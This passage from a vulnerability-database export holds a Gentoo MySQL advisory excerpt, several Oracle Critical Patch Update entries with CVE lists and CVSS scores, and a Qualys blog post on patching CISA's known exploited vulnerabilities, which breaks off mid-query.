crafted MySQL server, possibly resulting in execution of arbitrary code with the privileges of the process. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll MySQL users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/mysql-5.5.39\"", "cvss3": {}, "published": "2014-09-04T00:00:00", "type": "gentoo", "title": "MySQL: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1861", "CVE-2013-2134", "CVE-2013-3839", "CVE-2013-5767", "CVE-2013-5770", "CVE-2013-5786", "CVE-2013-5793", "CVE-2013-5807", "CVE-2013-5860", "CVE-2013-5881", "CVE-2013-5882", "CVE-2013-5891", "CVE-2013-5894", "CVE-2013-5908", "CVE-2014-0001", "CVE-2014-0384", "CVE-2014-0386", "CVE-2014-0393", "CVE-2014-0401", "CVE-2014-0402", "CVE-2014-0412", "CVE-2014-0420", "CVE-2014-0427", "CVE-2014-0430", "CVE-2014-0431", "CVE-2014-0433", "CVE-2014-0437", "CVE-2014-2419", "CVE-2014-2430", "CVE-2014-2431", "CVE-2014-2432", "CVE-2014-2434", "CVE-2014-2435", "CVE-2014-2436", "CVE-2014-2438", "CVE-2014-2440"], "modified": "2014-09-04T00:00:00", "id": "GLSA-201409-04", "href": "https://security.gentoo.org/glsa/201409-04", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2021-06-08T18:55:22", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. 
Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible.** Starting Oct 2013, the Java SE Critical Patch Update will be released quarterly every year as per the main Oracle Critical Patch Update Schedule. This Critical Patch Update contains 127 new security fixes (including 51 Java fixes) across the product families listed below.\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n", "cvss3": {}, "published": "2013-10-15T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update - October 2013", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-3792", "CVE-2012-2750", "CVE-2013-2248", "CVE-2013-5856", "CVE-2013-5848", "CVE-2013-5782", "CVE-2013-5846", "CVE-2013-5818", "CVE-2013-3839", "CVE-2013-5779", "CVE-2013-5807", "CVE-2013-4002", "CVE-2013-3831", "CVE-2013-5850", "CVE-2013-3840", "CVE-2013-5778", "CVE-2013-3827", "CVE-2013-3833", "CVE-2013-5867", "CVE-2013-0169", "CVE-2013-3828", "CVE-2013-3785", "CVE-2013-5862", "CVE-2013-5762", "CVE-2013-3766", "CVE-2013-2172", "CVE-2013-5776", "CVE-2013-5827", "CVE-2013-5788", "CVE-2013-5765", "CVE-2013-5773", "CVE-2013-3841", "CVE-2013-5842", "CVE-2013-2251", "CVE-2013-3836", "CVE-2013-5836", "CVE-2013-5810", "CVE-2013-3762", "CVE-2013-5830", "CVE-2013-5859", "CVE-2013-5832", "CVE-2013-5864", "CVE-2013-5841", "CVE-2013-5845", "CVE-2013-5813", "CVE-2013-3814", "CVE-2013-5763", 
"CVE-2013-5839", "CVE-2013-5784", "CVE-2013-5792", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-3838", "CVE-2013-5771", "CVE-2011-3389", "CVE-2013-5787", "CVE-2013-3835", "CVE-2013-5852", "CVE-2013-3834", "CVE-2013-5828", "CVE-2013-5854", "CVE-2013-5768", "CVE-2013-5806", "CVE-2013-0149", "CVE-2013-5805", "CVE-2013-5826", "CVE-2013-5857", "CVE-2013-5825", "CVE-2013-5811", "CVE-2013-5789", "CVE-2013-5822", "CVE-2013-5823", "CVE-2013-5837", "CVE-2013-2461", "CVE-2013-5843", "CVE-2013-5812", "CVE-2013-5849", "CVE-2013-5769", "CVE-2013-5865", "CVE-2013-5780", "CVE-2013-3842", "CVE-2013-3624", "CVE-2013-5761", "CVE-2013-5791", "CVE-2013-5816", "CVE-2013-5824", "CVE-2013-5831", "CVE-2013-5847", "CVE-2013-2134", "CVE-2013-5799", "CVE-2013-5814", "CVE-2013-5798", "CVE-2013-5766", "CVE-2013-5775", "CVE-2013-5863", "CVE-2013-2135", "CVE-2013-5829", "CVE-2013-5786", "CVE-2013-5803", "CVE-2013-5844", "CVE-2013-5796", "CVE-2013-5861", "CVE-2013-5781", "CVE-2013-5835", "CVE-2013-3826", "CVE-2013-5819", "CVE-2013-5770", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5767", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-3832", "CVE-2013-5793", "CVE-2013-5777", "CVE-2013-5790", "CVE-2013-3837", "CVE-2013-5838", "CVE-2013-5794", "CVE-2013-5840", "CVE-2013-5801", "CVE-2013-5866", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772", "CVE-2013-5815"], "modified": "2015-02-24T00:00:00", "id": "ORACLE:CPUOCT2013-1899837", "href": "https://www.oracle.com/security-alerts/cpuoct2013.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-08T18:59:32", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. 
Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible.** This Critical Patch Update contains 144 new security fixes across the product families listed below.\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n", "cvss3": {}, "published": "2014-01-14T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update - January 2014", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0371", "CVE-2012-3544", "CVE-2014-0400", "CVE-2013-5879", "CVE-2013-5876", "CVE-2013-5889", "CVE-2013-2248", "CVE-2013-5909", "CVE-2007-0008", "CVE-2014-0392", "CVE-2013-5873", "CVE-2013-5858", "CVE-2014-0405", "CVE-2013-5860", "CVE-2014-0367", "CVE-2014-0385", "CVE-2013-5878", "CVE-2006-0999", "CVE-2014-0410", "CVE-2012-4558", "CVE-2014-0398", "CVE-2013-5897", "CVE-2013-2071", "CVE-2014-0404", "CVE-2014-0415", "CVE-2014-0434", "CVE-2013-5884", "CVE-2014-0435", "CVE-2014-0443", "CVE-2013-5870", "CVE-2014-0390", "CVE-2013-5905", "CVE-2013-5880", "CVE-2013-5904", "CVE-2014-0391", "CVE-2013-5888", "CVE-2013-5893", "CVE-2014-0387", "CVE-2013-2251", "CVE-2014-0393", "CVE-2014-0399", "CVE-2012-4605", "CVE-2013-5821", "CVE-2014-0431", "CVE-2013-5898", "CVE-2014-0427", "CVE-2014-0441", "CVE-2013-5900", "CVE-2013-1654", "CVE-2014-0433", "CVE-2014-0375", "CVE-2013-5886", "CVE-2014-0401", "CVE-2014-0396", "CVE-2014-0406", "CVE-2013-5872", "CVE-2014-0440", 
"CVE-2014-0425", "CVE-2013-5883", "CVE-2013-1862", "CVE-2013-5834", "CVE-2014-0418", "CVE-2014-0373", "CVE-2013-5877", "CVE-2013-5874", "CVE-2014-0439", "CVE-2014-0394", "CVE-2013-5887", "CVE-2014-0408", "CVE-2014-0376", "CVE-2014-0422", "CVE-2014-0419", "CVE-2014-0411", "CVE-2014-0369", "CVE-2014-0366", "CVE-2013-5882", "CVE-2013-5895", "CVE-2003-1067", "CVE-2014-0437", "CVE-2013-5885", "CVE-2013-5901", "CVE-2013-5881", "CVE-2013-2067", "CVE-2014-0389", "CVE-2014-0388", "CVE-2013-5899", "CVE-2014-0412", "CVE-2013-5896", "CVE-2013-3830", "CVE-2014-0417", "CVE-2014-0372", "CVE-2014-0407", "CVE-2013-5910", "CVE-2013-5906", "CVE-2014-0428", "CVE-2013-5891", "CVE-2014-0382", "CVE-2014-0370", "CVE-2013-5808", "CVE-2006-0998", "CVE-2013-2134", "CVE-2013-5871", "CVE-2014-0402", "CVE-2013-2924", "CVE-2013-4310", "CVE-2014-0368", "CVE-2014-0420", "CVE-2013-5853", "CVE-2014-0423", "CVE-2013-2135", "CVE-2013-5868", "CVE-2014-0430", "CVE-2014-0374", "CVE-2013-5875", "CVE-2013-5869", "CVE-2013-5907", "CVE-2014-0377", "CVE-2012-3499", "CVE-2013-5902", "CVE-2013-5894", "CVE-2013-5795", "CVE-2007-0009", "CVE-2013-5892", "CVE-2014-0381", "CVE-2014-0383", "CVE-2014-0424", "CVE-2014-0395", "CVE-2013-4316", "CVE-2014-0379", "CVE-2014-0403", "CVE-2013-5908", "CVE-2014-0386", "CVE-2007-1858", "CVE-2013-5785", "CVE-2014-0445", "CVE-2013-5764", "CVE-2014-0444", "CVE-2014-0378", "CVE-2013-5833", "CVE-2013-1620", "CVE-2013-5890", "CVE-2014-0416", "CVE-2014-0380", "CVE-2014-0438"], "modified": "2014-01-14T00:00:00", "id": "ORACLE:CPUJAN2014-1972949", "href": "https://www.oracle.com/security-alerts/cpujan2014.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-08T18:53:03", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. 
Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n \n\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n \n\n\n**Oracle continues to periodically receive reports of malicious exploitation of vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that malicious attackers have been successful because customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\n \n\n\nThis Critical Patch Update contains 193 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\n \n\n\n** Please note that on May 15, 2015, Oracle released [Security Alert for CVE-2015-3456 (QEMU \"Venom\")](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-3456-2542656.html>). Customers of affected Oracle products are strongly advised to apply the fixes and/or configuration steps that were announced for CVE-2015-3456. **\n\n \n\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. 
More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n\n \n\n", "cvss3": {}, "published": "2015-07-14T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update - July 2015", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-1926", "CVE-2015-1802", "CVE-2015-4000", "CVE-2015-2591", "CVE-2015-0443", "CVE-2015-1803", "CVE-2015-4771", "CVE-2015-2627", "CVE-2015-2615", "CVE-2014-3566", "CVE-2015-4764", "CVE-2015-4774", "CVE-2015-2601", "CVE-2015-4738", "CVE-2014-8098", "CVE-2015-0235", "CVE-2015-4729", "CVE-2015-1804", "CVE-2015-4751", "CVE-2015-0444", "CVE-2015-0445", "CVE-2015-4749", "CVE-2014-8092", "CVE-2015-4758", "CVE-2014-7809", "CVE-2015-2643", "CVE-2015-4770", "CVE-2015-4747", "CVE-2015-2661", "CVE-2015-4778", "CVE-2015-2632", "CVE-2015-2625", "CVE-2015-2617", "CVE-2015-4784", "CVE-2015-2664", "CVE-2015-2605", "CVE-2015-2597", "CVE-2015-4785", "CVE-2015-4732", "CVE-2015-2653", "CVE-2014-3572", "CVE-2014-3613", "CVE-2015-0206", "CVE-2014-0227", "CVE-2015-2595", "CVE-2015-4782", "CVE-2015-0286", "CVE-2015-3244", "CVE-2015-2648", "CVE-2015-2657", "CVE-2014-0230", "CVE-2014-8100", "CVE-2015-4789", "CVE-2015-2581", "CVE-2015-2613", "CVE-2015-2658", "CVE-2014-3571", "CVE-2015-4736", "CVE-2015-2599", "CVE-2013-2251", "CVE-2013-5704", "CVE-2015-4739", "CVE-2015-0288", "CVE-2015-4790", "CVE-2013-6422", "CVE-2015-2589", "CVE-2010-1324", "CVE-2015-2623", "CVE-2015-2631", "CVE-2010-4020", "CVE-2015-2596", "CVE-2015-4763", "CVE-2015-0285", "CVE-2015-4783", "CVE-2015-2620", "CVE-2015-2650", "CVE-2011-3389", "CVE-2015-2654", "CVE-2015-0207", "CVE-2015-2607", "CVE-2015-2639", "CVE-2015-2611", "CVE-2015-2645", "CVE-2015-2634", "CVE-2015-2594", "CVE-2014-8275", "CVE-2015-3456", "CVE-2015-0467", "CVE-2015-2584", "CVE-2015-0208", "CVE-2015-2808", "CVE-2013-0249", "CVE-2014-3570", "CVE-2015-2590", "CVE-2015-2656", "CVE-2015-2626", "CVE-2015-2628", "CVE-2015-4768", 
"CVE-2015-4761", "CVE-2015-4745", "CVE-2015-4750", "CVE-2014-0139", "CVE-2015-2635", "CVE-2015-4756", "CVE-2015-2647", "CVE-2014-3707", "CVE-2015-0293", "CVE-2015-2600", "CVE-2015-2580", "CVE-2014-8097", "CVE-2014-8101", "CVE-2015-2640", "CVE-2015-4733", "CVE-2015-2646", "CVE-2014-1568", "CVE-2015-2651", "CVE-2015-2603", "CVE-2014-8091", "CVE-2015-4765", "CVE-2015-2660", "CVE-2015-2604", "CVE-2015-0255", "CVE-2015-4772", "CVE-2015-2662", "CVE-2015-4735", "CVE-2015-0468", "CVE-2015-4779", "CVE-2015-0209", "CVE-2015-2585", "CVE-2013-2186", "CVE-2014-3567", "CVE-2015-2614", "CVE-2014-0015", "CVE-2015-4737", "CVE-2015-4776", "CVE-2015-4757", "CVE-2015-4728", "CVE-2015-2637", "CVE-2015-2606", "CVE-2015-4769", "CVE-2015-0204", "CVE-2015-2621", "CVE-2015-4786", "CVE-2015-4787", "CVE-2015-2638", "CVE-2015-4740", "CVE-2015-2619", "CVE-2015-4731", "CVE-2014-8095", "CVE-2015-4727", "CVE-2015-4741", "CVE-2015-2636", "CVE-2015-2659", "CVE-2015-2655", "CVE-2015-4775", "CVE-2015-4773", "CVE-2014-8102", "CVE-2015-0291", "CVE-2015-4746", "CVE-2015-2629", "CVE-2014-8096", "CVE-2015-4788", "CVE-2015-4755", "CVE-2015-2602", "CVE-2015-4748", "CVE-2015-0287", "CVE-2015-2622", "CVE-2015-2610", "CVE-2012-0036", "CVE-2013-2174", "CVE-2015-2663", "CVE-2015-4742", "CVE-2014-8093", "CVE-2015-0289", "CVE-2015-2652", "CVE-2015-4759", "CVE-2015-0446", "CVE-2015-0292", "CVE-2015-2582", "CVE-2015-4780", "CVE-2014-1569", "CVE-2015-4781", "CVE-2015-2618", "CVE-2015-2641", "CVE-2015-2593", "CVE-2015-4744", "CVE-2015-2598", "CVE-2014-0138", "CVE-2015-2587", "CVE-2015-2630", "CVE-2015-2592", "CVE-2015-4767", "CVE-2015-0290", "CVE-2015-2616", "CVE-2015-0205", "CVE-2015-2624", "CVE-2015-2609", "CVE-2015-4777", "CVE-2010-1323", "CVE-2015-1787", "CVE-2015-4754", "CVE-2014-3569", "CVE-2015-2588", "CVE-2015-4760", "CVE-2015-2583", "CVE-2015-4743", "CVE-2013-4545", "CVE-2015-4752", "CVE-2015-2586", "CVE-2015-4753", "CVE-2015-2649", "CVE-2015-2612", "CVE-2015-2644"], "modified": "2016-07-07T00:00:00", "id": 
"ORACLE:CPUJUL2015-2367936", "href": "https://www.oracle.com/security-alerts/cpujul2015.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-04T21:16:01", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to: Critical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 193 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ https://blogs.oracle.com/security](<https://blogs.oracle.com/security/>).\n\n**Please note that on May 15, 2015, Oracle released Security Alert for CVE-2015-3456 (QEMU \"Venom\") .Customers of affected Oracle products are strongly advised to apply the fixes and/or configuration steps that were announced for CVE-2015-3456.**\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. 
More information about Oracle's use of CVRF is available at: https://www.oracle.com/security-alerts/cpufaq.html#CVRF.\n", "cvss3": {}, "published": "2015-07-14T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - July 2015", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-1323", "CVE-2010-1324", "CVE-2010-4020", "CVE-2011-3389", "CVE-2012-0036", "CVE-2013-0249", "CVE-2013-2174", "CVE-2013-2186", "CVE-2013-2251", "CVE-2013-4545", "CVE-2013-5704", "CVE-2013-6422", "CVE-2014-0015", "CVE-2014-0138", "CVE-2014-0139", "CVE-2014-0227", "CVE-2014-0230", "CVE-2014-1568", "CVE-2014-1569", "CVE-2014-3566", "CVE-2014-3567", "CVE-2014-3569", "CVE-2014-3570", "CVE-2014-3571", "CVE-2014-3572", "CVE-2014-3613", "CVE-2014-3707", "CVE-2014-7809", "CVE-2014-8091", "CVE-2014-8092", "CVE-2014-8093", "CVE-2014-8095", "CVE-2014-8096", "CVE-2014-8097", "CVE-2014-8098", "CVE-2014-8100", "CVE-2014-8101", "CVE-2014-8102", "CVE-2014-8275", "CVE-2015-0204", "CVE-2015-0205", "CVE-2015-0206", "CVE-2015-0207", "CVE-2015-0208", "CVE-2015-0209", "CVE-2015-0235", "CVE-2015-0255", "CVE-2015-0285", "CVE-2015-0286", "CVE-2015-0287", "CVE-2015-0288", "CVE-2015-0289", "CVE-2015-0290", "CVE-2015-0291", "CVE-2015-0292", "CVE-2015-0293", "CVE-2015-0443", "CVE-2015-0444", "CVE-2015-0445", "CVE-2015-0446", "CVE-2015-0467", "CVE-2015-0468", "CVE-2015-1787", "CVE-2015-1802", "CVE-2015-1803", "CVE-2015-1804", "CVE-2015-1926", "CVE-2015-2580", "CVE-2015-2581", "CVE-2015-2582", "CVE-2015-2583", "CVE-2015-2584", "CVE-2015-2585", "CVE-2015-2586", "CVE-2015-2587", "CVE-2015-2588", "CVE-2015-2589", "CVE-2015-2590", "CVE-2015-2591", "CVE-2015-2592", "CVE-2015-2593", "CVE-2015-2594", "CVE-2015-2595", "CVE-2015-2596", "CVE-2015-2597", "CVE-2015-2598", "CVE-2015-2599", "CVE-2015-2600", "CVE-2015-2601", "CVE-2015-2602", "CVE-2015-2603", "CVE-2015-2604", "CVE-2015-2605", "CVE-2015-2606", "CVE-2015-2607", "CVE-2015-2609", "CVE-2015-2610", "CVE-2015-2611", "CVE-2015-2612", 
"CVE-2015-2613", "CVE-2015-2614", "CVE-2015-2615", "CVE-2015-2616", "CVE-2015-2617", "CVE-2015-2618", "CVE-2015-2619", "CVE-2015-2620", "CVE-2015-2621", "CVE-2015-2622", "CVE-2015-2623", "CVE-2015-2624", "CVE-2015-2625", "CVE-2015-2626", "CVE-2015-2627", "CVE-2015-2628", "CVE-2015-2629", "CVE-2015-2630", "CVE-2015-2631", "CVE-2015-2632", "CVE-2015-2634", "CVE-2015-2635", "CVE-2015-2636", "CVE-2015-2637", "CVE-2015-2638", "CVE-2015-2639", "CVE-2015-2640", "CVE-2015-2641", "CVE-2015-2643", "CVE-2015-2644", "CVE-2015-2645", "CVE-2015-2646", "CVE-2015-2647", "CVE-2015-2648", "CVE-2015-2649", "CVE-2015-2650", "CVE-2015-2651", "CVE-2015-2652", "CVE-2015-2653", "CVE-2015-2654", "CVE-2015-2655", "CVE-2015-2656", "CVE-2015-2657", "CVE-2015-2658", "CVE-2015-2659", "CVE-2015-2660", "CVE-2015-2661", "CVE-2015-2662", "CVE-2015-2663", "CVE-2015-2664", "CVE-2015-2808", "CVE-2015-3244", "CVE-2015-3456", "CVE-2015-4000", "CVE-2015-4727", "CVE-2015-4728", "CVE-2015-4729", "CVE-2015-4731", "CVE-2015-4732", "CVE-2015-4733", "CVE-2015-4735", "CVE-2015-4736", "CVE-2015-4737", "CVE-2015-4738", "CVE-2015-4739", "CVE-2015-4740", "CVE-2015-4741", "CVE-2015-4742", "CVE-2015-4743", "CVE-2015-4744", "CVE-2015-4745", "CVE-2015-4746", "CVE-2015-4747", "CVE-2015-4748", "CVE-2015-4749", "CVE-2015-4750", "CVE-2015-4751", "CVE-2015-4752", "CVE-2015-4753", "CVE-2015-4754", "CVE-2015-4755", "CVE-2015-4756", "CVE-2015-4757", "CVE-2015-4758", "CVE-2015-4759", "CVE-2015-4760", "CVE-2015-4761", "CVE-2015-4763", "CVE-2015-4764", "CVE-2015-4765", "CVE-2015-4767", "CVE-2015-4768", "CVE-2015-4769", "CVE-2015-4770", "CVE-2015-4771", "CVE-2015-4772", "CVE-2015-4773", "CVE-2015-4774", "CVE-2015-4775", "CVE-2015-4776", "CVE-2015-4777", "CVE-2015-4778", "CVE-2015-4779", "CVE-2015-4780", "CVE-2015-4781", "CVE-2015-4782", "CVE-2015-4783", "CVE-2015-4784", "CVE-2015-4785", "CVE-2015-4786", "CVE-2015-4787", "CVE-2015-4788", "CVE-2015-4789", "CVE-2015-4790"], "modified": "2016-07-07T00:00:00", "id": 
"ORACLE:CPUJUL2015", "href": "https://www.oracle.com/security-alerts/cpujul2015.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. 
This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. 
Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. 
The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`C